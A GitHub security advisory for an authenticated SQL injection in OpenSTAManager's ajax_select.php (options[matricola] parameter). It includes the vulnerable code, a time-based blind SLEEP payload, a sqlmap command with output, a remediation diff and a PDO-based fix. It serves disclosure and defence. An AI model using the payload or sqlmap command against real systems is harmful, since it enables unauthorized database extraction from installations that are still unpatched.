GHSA-qjv8-63xq-gq8m

Published: 06 Feb 2026
Source: github
GitHub: reviewed
CVSS4: 8.7

Description

OpenSTAManager has a SQL Injection in ajax_select.php (componenti endpoint)

Summary

A SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attacker can inject malicious SQL code through the options[matricola] parameter.

Proof of Concept

Vulnerable Code

File: modules/impianti/ajax/select.php:122-124

case 'componenti':
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
    }

Data Flow

  1. Source: $_GET['options']['matricola'] → $superselect['matricola']
  2. Vulnerable: user input is concatenated directly into the IN() clause without sanitization
  3. Sink: the query is executed via the AJAX framework

Exploit

Manual PoC (Time-based Blind SQLi):

GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>

SQLMap Exploitation:

sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --risk=3

SQLMap Output:

[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12

Impact

  • Data Exfiltration: Time-based blind SQL Injection allows complete database extraction
  • Authentication Bypass: Access to sensitive component and equipment data
  • Data Manipulation: Potential unauthorized modification of records

Remediation

Cast the values to integers before using them in SQL:

Before:

$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
}

After:

$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $ids = array_map('intval', explode(',', $impianti));
    $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';
}
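As an added example (not OpenSTAManager's own code, which goes through its own database layer), a stricter form of the remediation in plain PHP with PDO: it rejects any item that is not an unsigned integer instead of coercing it with intval(), and binds the ids through placeholders so user text never reaches the SQL string. The PDO handle and the table layout are assumptions for illustration.

```php
<?php
// Added example, not OpenSTAManager's own code. intval() silently maps
// garbage to 0; here every id must be digits only and the IN() list is
// bound via PDO placeholders. The PDO handle and table are assumptions.
declare(strict_types=1);

/**
 * Parse a comma-separated id list, rejecting anything that is not digits.
 * Parentheses, spaces and keywords (as in the advisory's payload) all fail.
 *
 * @return int[]
 */
function parseIdList(string $raw): array
{
    if (trim($raw) === '') {
        return [];
    }
    $ids = [];
    foreach (explode(',', $raw) as $item) {
        $item = trim($item);
        if ($item === '' || !ctype_digit($item)) {
            throw new InvalidArgumentException("Invalid id in matricola list: $item");
        }
        $ids[] = (int) $item;
    }
    return $ids;
}

/** One placeholder per id; values are bound, never concatenated. */
function selectComponenti(PDO $pdo, string $rawMatricola): array
{
    $ids = parseIdList($rawMatricola);
    if ($ids === []) {
        return [];
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $pdo->prepare(
        'SELECT * FROM `my_componenti` WHERE `id_impianto` IN (' . $placeholders . ')'
    );
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The advisory's time-based payload is rejected before any query is built.
try {
    parseIdList('1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1');
} catch (InvalidArgumentException $e) {
    error_log('Rejected matricola list: ' . $e->getMessage());
}
```

Logging the rejection, as the catch block does, also gives a simple detection signal for injection attempts against this parameter.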

Credit

Discovered by: Łukasz Rybak

Packages

Name: devcode-it/openstamanager (composer)
Affected versions: <= 2.9.8
Fixed version: none

EPSS

Percentile: 1%
0.0001
Low

8.7 High

CVSS4

Weaknesses

CWE-89

Related vulnerabilities

nvd
2 days ago

OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attacker can inject malicious SQL code through the options[matricola] parameter.
